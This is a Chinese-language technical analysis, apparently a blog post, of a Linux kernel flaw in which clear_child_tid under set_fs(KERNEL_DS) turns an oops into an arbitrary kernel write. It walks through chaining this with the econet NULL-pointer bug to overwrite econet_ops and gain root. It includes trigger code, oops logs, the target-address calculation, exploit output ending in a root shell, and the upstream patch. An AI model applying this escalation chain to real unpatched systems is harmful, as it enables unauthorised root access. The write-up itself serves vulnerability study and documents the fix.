Nelson Elhage最近发现了一个内核设计上的漏洞, 通过利用这个漏洞可以将一些以前只能dos的漏洞变成可以权限提升的漏洞。
当fork一个进程在的时候, copy_process执行如下操作:
static struct task_struct *copy_process(unsigned long clone_flags,
unsigned long stack_start,
struct pt_regs *regs,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace)
{
p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
/*
* Clear TID on mm_release()?
*/
p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr: NULL;
}
当CLONE_CHILD_CLEARTID标志被设置的时候,copy_process会把child_tidptr指针赋值给p->clear_child_tid,
最重要的是child_tidptr是从用户空间传递进来的, 可以通过clone系统调用, 配合CLONE_CHILD_CLEARTID标志,
将child_tidptr传递给内核:
clone((int (*)(void *))trigger,
(void *)((unsigned long)newstack + 65536),
CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
&fildes, NULL, NULL, child_tidptr);
当一个进程在exit的时候,do_exit()会执行如下操作:
NORET_TYPE void do_exit(long code)
{
exit_mm(tsk);
}
static void exit_mm(struct task_struct * tsk)
{
struct mm_struct *mm = tsk->mm;
struct core_state *core_state;
mm_release(tsk, mm);
}
void mm_release(struct task_struct *tsk, struct mm_struct *mm)
{
if (tsk->clear_child_tid) {
if (!(tsk->flags & PF_SIGNALED) &&
atomic_read(&mm->mm_users) > 1) {
/*
* We don't check the error code - if userspace has
* not set up a proper pointer then tough luck.
*/
put_user(0, tsk->clear_child_tid);
sys_futex(tsk->clear_child_tid, FUTEX_WAKE,
1, NULL, NULL, 0);
}
tsk->clear_child_tid = NULL;
}
}
当clear_child_tid被设置的时候,有如下操作:
put_user(0, tsk->clear_child_tid);
通过put_user把0值赋值给tsk->clear_child_tid所指向的内存。tsk->clear_child_tid
是用户可控的,因此可以将任意一个用户空间地址进行清0操作。这本身也是一个安全漏洞,kernel官方
已经进行了修补:http://lkml.org/lkml/2009/7/31/76。
看下put_user是怎么实现的:
arch/x86/include/asm/uaccess.h:
#define put_user(x, ptr) \
({ \
int __ret_pu; \
__typeof__(*(ptr)) __pu_val; \
__chk_user_ptr(ptr); \
might_fault(); \
__pu_val = x; \
switch (sizeof(*(ptr))) { \
case 1: \
__put_user_x(1, __pu_val, ptr, __ret_pu); \
break; \
case 2: \
__put_user_x(2, __pu_val, ptr, __ret_pu); \
break; \
case 4: \
__put_user_x(4, __pu_val, ptr, __ret_pu); \
break; \
case 8: \
__put_user_x8(__pu_val, ptr, __ret_pu); \
break; \
default: \
__put_user_x(X, __pu_val, ptr, __ret_pu); \
break; \
} \
__ret_pu; \
})
根据ptr的类型大小,利用__put_user_x宏将x拷贝1,2,4,8个字节到ptr所指向的内存:
#define __put_user_x(size, x, ptr, __ret_pu) \
asm volatile("call __put_user_" #size : "=a" (__ret_pu) \
: "0" ((typeof(*(ptr)))(x)), "c" (ptr) : "ebx")
它完成两件事, 将eax填充为x, 将ecx填充为ptr, 然后调用__put_user_4,因为clear_child_tid
是个int类型的:
struct task_struct {
int __user *set_child_tid; /* CLONE_CHILD_SETTID */
int __user *clear_child_tid; /* CLONE_CHILD_CLEARTID */
}
arch/x86/lib/putuser.S:
ENTRY(__put_user_4)
ENTER
mov TI_addr_limit(%_ASM_BX),%_ASM_BX
sub $3,%_ASM_BX
cmp %_ASM_BX,%_ASM_CX
jae bad_put_user
3: movl %eax,(%_ASM_CX)
xor %eax,%eax
EXIT
ENDPROC(__put_user_4)
_ASM_BX,_ASM_CX在32位对应ebx,ecx,64位对应rbx,rcx。
TI_addr_limit(%_ASM_BX)得到当前进程的地址空间上限,由ebx保存,然后比较一下要访问的addr是否高于进程地址上限
,高于的话, 则不会进行拷贝操作。否则的话, 将eax的值赋值给ecx所指向的内存, 因为是(%_ASM_CX)。
put_user本身没有问题, 但是如果一个oops发生的时候有如下操作:
set_fs(KERNEL_DS);
arch/x86/include/asm/uaccess.h:
#define set_fs(x) (current_thread_info()->addr_limit = (x))
set_fs将当前进程的地址空间上限设为KERNL_DS, 会绕过put_user的那个指针检查, 可以将一个NULL值写入任意一个
内核地址空间。 但是要利用这个漏洞需要有set_fs(KERNEL_DS);这个前提, 通常的一些内核bug产生的oops就满足这个条件。
下面看下如何配合econet的一个NULL pointer Dereference漏洞来进行权限提升。
关于exploit NULL pointer Dereference漏洞可以参考我以前写的一篇paper。现在高版本的内核已经将映射低内存做了限制:
wzt@program:~/kernel$ cat /proc/sys/vm/mmap_min_addr
65536
因此NULL pointer的漏洞只能当作dos来用,但是可以利用上述的漏洞来将这个dos漏洞转化为本地提权漏洞。Dan Rosenberg写了一个
exploit用来演示如何利用这个漏洞。先看下econet这个NULL pointer漏洞是如何产生的:
static int econet_sendmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t len)
{
struct sock *sk = sock->sk;
struct sockaddr_ec *saddr=(struct sockaddr_ec *)msg->msg_name;
eb->cookie = saddr->cookie;
}
saddr可以由用户空间控制,因此可以是个NULL值,saddr->cookie;操作将会引发一次oops,可以利用如下代码来出发:
int trigger(int * fildes)
{
int ret;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
if(ret < 0) {
printf("[*] Failed to set Econet address.\n");
return -1;
}
splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
/* Shouldn't get here... */
exit(0);
}
[ 2724.871624] BUG: unable to handle kernel NULL pointer dereference at 00000008
[ 2724.871629] IP: [<e08423d5>] econet_sendmsg+0x215/0x530 [econet]
[ 2724.871636] *pde = 1fa24067 *pte = 00000000
[ 2724.871639] Oops: 0000 [#1] SMP
[ 2724.871642] last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/PNP0C0A:00/power_supply/BAT0/voltage_now
[ 2724.871645] Modules linked in: econet binfmt_misc snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device ppdev parport_pc snd joydev psmouse i2c_piix4 serio_raw soundcore snd_page_alloc lp parport usbhid e1000 hid ahci libahci
[ 2724.871662]
[ 2724.871669] Pid: 1541, comm: exp Not tainted 2.6.35-22-generic #33-Ubuntu /VirtualBox
[ 2724.871671] EIP: 0060:[<e08423d5>] EFLAGS: 00010286 CPU: 0
[ 2724.871674] EIP is at econet_sendmsg+0x215/0x530 [econet]
[ 2724.871676] EAX: ccd3ccc0 EBX: ce06fe14 ECX: ccd3ccd8 EDX: 00000000
[ 2724.871678] ESI: 00000000 EDI: ce06e000 EBP: ce06fd20 ESP: ce06fc84
[ 2724.871680] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
[ 2724.871682] Process exp (pid: 1541, ti=ce06e000 task=ce194c20 task.ti=ce06e000)
[ 2724.871683] Stack:
[ 2724.871685] ce06fcf8 00000080 c9344000 ce06fcec 00000008 c9344000 00000080 ce06fcf4
[ 2724.871693] <0> 00000080 00000000 ce06fccc ce06fe14 ce06ff1c 0088ecd8 cce86c00 00000000
[ 2724.871697] <0> ce06e000 00000088 ce06fc90 c02193b6 00000002 00000000 00000000 ce06fcec
[ 2724.871702] Call Trace:
[ 2724.871708] [<c02193b6>] ? do_readv_writev+0x146/0x1b0
[ 2724.871713] [<c04e7489>] ? sock_sendmsg+0xd9/0x100
[ 2724.871716] [<c013a194>] ? enqueue_entity+0x174/0x200
[ 2724.871719] [<c04e74e5>] ? kernel_sendmsg+0x35/0x50
[ 2724.871722] [<c04e94e8>] ? sock_no_sendpage+0x68/0x80
[ 2724.871725] [<c04e9480>] ? sock_no_sendpage+0x0/0x80
[ 2724.871728] [<c04e5163>] ? kernel_sendpage+0x43/0x70
[ 2724.871730] [<c04e51d2>] ? sock_sendpage+0x42/0x50
[ 2724.871734] [<c0238097>] ? pipe_to_sendpage+0x87/0x90
[ 2724.871736] [<c04e5190>] ? sock_sendpage+0x0/0x50
[ 2724.871739] [<c02380f4>] ? splice_from_pipe_feed+0x54/0xe0
[ 2724.871741] [<c0238010>] ? pipe_to_sendpage+0x0/0x90
[ 2724.871744] [<c023862c>] ? __splice_from_pipe+0x5c/0x70
[ 2724.871747] [<c0238010>] ? pipe_to_sendpage+0x0/0x90
[ 2724.871749] [<c02386a3>] ? splice_from_pipe+0x63/0x80
[ 2724.871752] [<c0238700>] ? generic_splice_sendpage+0x0/0x30
[ 2724.871755] [<c0238726>] ? generic_splice_sendpage+0x26/0x30
[ 2724.871757] [<c0238010>] ? pipe_to_sendpage+0x0/0x90
[ 2724.871760] [<c0238f7f>] ? do_splice_from+0x5f/0x90
[ 2724.871763] [<c02396e3>] ? do_splice+0xc3/0x210
[ 2724.871766] [<c0226eb9>] ? do_vfs_ioctl+0x79/0x2d0
[ 2724.871768] [<c0239a3d>] ? sys_splice+0xad/0xd0
[ 2724.871771] [<c05c90a4>] ? syscall_call+0x7/0xb
[ 2724.871773] Code: 55 a8 3b 43 0c 72 bf 8b 4b 18 8d 45 d8 31 d2 89 04 24 8b 45 9c 83 e1 40 e8 89 75 ca df 85 c0 0f 84 ad 00 00 00 8b 75 a0 8d 48 18 <8b> 56 08 c7 41 18 e2 04 00 00 89 51 0c 8b 15 40 5a 7c c0 89 51
[ 2724.871796] EIP: [<e08423d5>] econet_sendmsg+0x215/0x530 [econet] SS:ESP 0068:ce06fc84
[ 2724.871800] CR2: 0000000000000008
[ 2724.871802] ---[ end trace 4630cf85b586bf8f ]---
由于有mmap_min_addr的限制,不能mmap到zero内存, 因此不能直接利用这个漏洞。 但是可以利用上述的任意内核地址写0漏洞继续将这个dos转为为权限提升。
当do_page_fault执行的时候, null pointer def的oops信息先打印出来, 然后会走入do_exit这个路径,进而走入put_user这个路径。
在这条路径的时候把econet_ops的econet_ioctl函数地址给覆盖成用户空间事先映射好的一段代码, 通常是shellcode代码, 那么在用户空间调用ioctl的时候,
就会执行我们的shellcode代码。注意put_user会将一个NULL值写入一个4byte的内存地址,如果我们直接将econet_ops里的econet_ioctl对应的偏移作为覆盖对象,
那么触发的时候将会在一次触发NULL pointer的操作。因此这里需要一个技巧只覆盖econet_ioctl的高8位地址为0,如果是高16/24位,那么mmap_min_addr也是不允许
映射的, 高12位put_user操作不了, 因此只能是覆盖高8位。
econet_ioctl + 4 +----+ 内存高址
| e0 |
econet_ioctl + 3 ------
| 84 |
econet_ioctl + 2 ------
| 32 |
econet_ioctl + 1 ------
| a0 |
econet_ioctl ------
| ...|
econet_ops ------ 内存低址
target = econet_ops + 10 * sizeof(void *) - 1; 即指向econet_ioctl + 3,将target传递给put_user, 那么econet_ioctl的高8位将会被清0。
先用clone将target覆盖一次试试:
[ 2725.874923] BUG: unable to handle kernel paging request at 008432a0
[ 2725.874938] IP: [<008432a0>] 0x8432a0
[ 2725.875362] *pde = 00000000
[ 2725.875369] Oops: 0000 [#2] SMP
[ 2725.875376] last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/PNP0C0A:00/power_supply/BAT0/voltage_now
[ 2725.875384] Modules linked in: econet binfmt_misc snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device ppdev parport_pc snd joydev psmouse i2c_piix4 serio_raw soundcore snd_page_alloc lp parport usbhid e1000 hid ahci libahci
[ 2725.875432]
[ 2725.875441] Pid: 1537, comm: exp Tainted: G D 2.6.35-22-generic #33-Ubuntu /VirtualBox
[ 2725.876253] EIP: 0060:[<008432a0>] EFLAGS: 00010297 CPU: 0
[ 2725.876261] EIP is at 0x8432a0
[ 2725.876267] EAX: d1244600 EBX: 00000000 ECX: 00000000 EDX: 00000000
[ 2725.876273] ESI: e08433a0 EDI: d1244600 EBP: d78b5f50 ESP: d78b5f30
[ 2725.876279] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
[ 2725.876287] Process exp (pid: 1537, ti=d78b4000 task=ce1958d0 task.ti=d78b4000)
[ 2725.876292] Stack:
[ 2725.876295] c04e55bd d78b5f64 0000001a c099dc60 00000000 d7a80980 00000000 00000000
[ 2725.876309] <0> d78b5f6c c0226622 00000002 c04e5550 d7a80980 00000005 00000000 d78b5f8c
[ 2725.876322] <0> c0226eb9 00000000 c03d9e40 df698708 d7a80980 00000005 00000000 d78b5fac
[ 2725.876337] Call Trace:
[ 2725.876352] [<c04e55bd>] ? sock_ioctl+0x6d/0x270
[ 2725.876363] [<c0226622>] ? vfs_ioctl+0x32/0xb0
[ 2725.876371] [<c04e5550>] ? sock_ioctl+0x0/0x270
[ 2725.876379] [<c0226eb9>] ? do_vfs_ioctl+0x79/0x2d0
[ 2725.876388] [<c03d9e40>] ? tty_write+0x0/0x210
[ 2725.876396] [<c0227177>] ? sys_ioctl+0x67/0x80
[ 2725.876405] [<c05c90a4>] ? syscall_call+0x7/0xb
[ 2725.876410] Code: Bad EIP value.
[ 2725.876416] EIP: [<008432a0>] 0x8432a0 SS:ESP 0068:d78b5f30
[ 2725.876428] CR2: 00000000008432a0
[ 2725.876435] ---[ end trace 4630cf85b586bf90 ]---
EIP is at 0x8432a0, 说明econet_ioctl的高8位确实被清0了, 因此现在只要在用户空间在0x8432a0这块内存映射shellcode,
那么当调用ioctl的时候, shellcode将会被执行。 由于是任意内核可写的,我将原始exp种的econet_ioctl替换为econet_bind是一样可以利用成功的:
wzt@wzt-VirtualBox:~/exp$ ./exp
[*] Resolving kernel addresses...
[+] Resolved econet_bind to 0xe1a110c0
[+] Resolved econet_ops to 0xe1a123a0
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] target: e1a123af
[*] landing: a110c0
[*] payload: 0xa11000
[*] Triggering payload...
[*] Got root!
# # #
# id
uid=0(root) gid=0(root) 组=0(root)
#
官方已经给出了patch:
If a user manages to trigger an oops with fs set to KERNEL_DS, fs is not
otherwise reset before do_exit(). do_exit may later (via mm_release in
fork.c) do a put_user to a user-controlled address, potentially allowing
a user to leverage an oops into a controlled write into kernel memory.
This is only triggerable in the presence of another bug, but this
potentially turns a lot of DoS bugs into privilege escalations, so it's
worth fixing. I have proof-of-concept code which uses this bug along
with CVE-2010-3849 to write a zero to an arbitrary kernel address, so
I've tested that this is not theoretical.
A more logical place to put this fix might be when we know an oops has
occurred, before we call do_exit(), but that would involve changing
every architecture, in multiple places.
Let's just stick it in do_exit instead.
[akpm@linux-foundation.org: update code comment]
Signed-off-by: Nelson Elhage <nelhage@ksplice.com>
Cc: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com>
Cc: <stable@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
kernel/exit.c patch | blob | history
diff --git a/kernel/exit.c b/kernel/exit.c
index 21aa7b3..676149a 100644 (file)
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -914,6 +914,15 @@ NORET_TYPE void do_exit(long code)
if (unlikely(!tsk->pid))
panic("Attempted to kill the idle task!");
+ /*
+ * If do_exit is called because this processes oopsed, it's possible
+ * that get_fs() was left as KERNEL_DS, so reset it to USER_DS before
+ * continuing. Amongst other possible reasons, this is to prevent
+ * mm_release()->clear_child_tid() from writing to a user-controlled
+ * kernel address.
+ */
+ set_fs(USER_DS);
+
tracehook_report_exit(&code);
validate_creds_for_do_exit(tsk)